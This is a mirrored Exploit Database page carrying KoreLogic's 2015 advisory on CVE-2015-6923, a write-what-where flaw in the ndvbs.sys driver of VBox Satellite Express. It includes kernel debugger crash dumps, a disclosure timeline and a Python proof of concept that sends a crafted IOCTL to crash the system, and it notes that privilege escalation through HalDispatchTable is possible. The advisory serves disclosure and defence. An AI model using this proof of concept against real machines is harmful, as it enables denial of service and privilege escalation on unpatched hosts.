VBox Satellite Express 2.3.17.3 – Arbitrary Write

• Exploit Database
• 135 阅读

• 作者： KoreLogic
  日期： 2015-09-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38225/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249

  KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation   Title: VBox Satellite Express Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-005 Publication Date: 2015.09.16 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt     1. Vulnerability Details   Affected Vendor: VBox Communications Affected Product: Satellite Express Protocol Affected Version: 2.3.17.3 Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86) CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-6923   2. Vulnerability Description   A vulnerability within the ndvbs module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege.   3. Technical Description   Example against Windows XP:   Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00) System Uptime: 0 days 0:11:19.843   ********************************************************************* * * *Bugcheck Analysis* * * *********************************************************************   Use !analyze -v to get detailed debugging information. BugCheck 50, {b41c5d4c, 0, 805068e1, 0} Probably caused by : ndvbs.sys ( ndvbs+94f ) Followup: MachineOwner ---------   kd> kn Call stack:# ChildEBP RetAddr 00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b 01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7 02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc 03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211 04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18 05 f64fdc34 804ee129 ndvbs+0x94f 06 f64fdc44 80574e56 nt!IopfCallDriver+0x31 07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70 08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7 09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8 0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 11 0021f6c0 1e07bd9c _ctypes+0x54d8 12 00000000 00000000 python27!PyObject_Call+0x4c     Example against Windows 7:   Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86 Copyright (c) Microsoft Corporation. All rights reserved. Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Personal Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850 Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850 Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00) System Uptime: 0 days 0:27:26.358 kd> .symfix;.reload Loading Kernel Symbols ............................................................... ................................................................ ........................ Loading User Symbols Loading unloaded module list ........ kd> !analyze -v ********************************************************************** ** *Bugcheck Analysis * ** **********************************************************************   KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e) This is a very common bugcheck.Usually the exception address pinpoints the driver/function that caused the problem.Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003.This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG.This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG.This will let us see why this breakpoint is happening. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: 929ef938, The address that the exception occurred at Arg3: 974f4a34, Trap Frame Arg4: 00000000   Debugging Details: ------------------   EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. FAULTING_IP: ndvbs+938 929ef938 8b4604mov eax,dword ptr [esi+4]   TRAP_FRAME:974f4a34 -- (.trap 0xffffffff974f4a34) ErrCode = 00000000 eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668 eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0 nv up ei pl zr na pe nc cs=0008ss=0010ds=0023es=0023fs=0030gs=0000 efl=00010246 ndvbs+0x938: 929ef938 8b4604mov eax,dword ptr [esi+4] Resetting default scope CUSTOMER_CRASH_COUNT:1 DEFAULT_BUCKET_ID:WIN7_DRIVER_FAULT BUGCHECK_STR:0x8E PROCESS_NAME:python.exe CURRENT_IRQL:0 ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre LAST_CONTROL_TRANSFER:from 82843593 to 929ef938 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938 974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63 974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8 974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa 974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a 974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a 0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4   STACK_COMMAND:kb FOLLOWUP_IP: ndvbs+938 929ef938 8b4604mov eax,dword ptr [esi+4]   SYMBOL_STACK_INDEX:0 SYMBOL_NAME:ndvbs+938 FOLLOWUP_NAME:MachineOwner MODULE_NAME: ndvbs IMAGE_NAME:ndvbs.sys DEBUG_FLR_IMAGE_TIMESTAMP:3ec77b36 BUCKET_ID:OLD_IMAGE_ndvbs.sys FAILURE_BUCKET_ID:OLD_IMAGE_ndvbs.sys ANALYSIS_SOURCE:KM FAILURE_ID_HASH_STRING:km:old_image_ndvbs.sys FAILURE_ID_HASH:{e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75} Followup: MachineOwner ---------   4. Mitigation and Remediation Recommendation   No response from vendor; no remediation available.   5. Credit   This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.   6. Disclosure Timeline   2015.05.19 - KoreLogic requests a security contact from info@vboxcomm.com. 2015.05.29 - KoreLogic requests a security contact from {info,sales,marketing}@vboxcomm.com. 2015.08.03 - 45 business days have elapsed since KoreLogic's last contact attempt. 2015.09.11 - KoreLogic requests CVE from Mitre. 2015.09.12 - Mitre issues CVE-2015-6923. 2015.09.16 - Public disclosure.   7. Proof of Concept   from sys import exit from ctypes import * NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory WriteProcessMemory = windll.kernel32.WriteProcessMemory DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None   device = "ndvbs" code = 0x00000ffd inlen = 0x0 outlen = 0x0 inbuf = 0x1 outbuf = 0xffff0000 inBufMem = "\x90"*inlen   def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1)   #NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)   DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen) CloseHandle(handle) return False   if __name__=="__main__": main()     The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/   KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html   Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt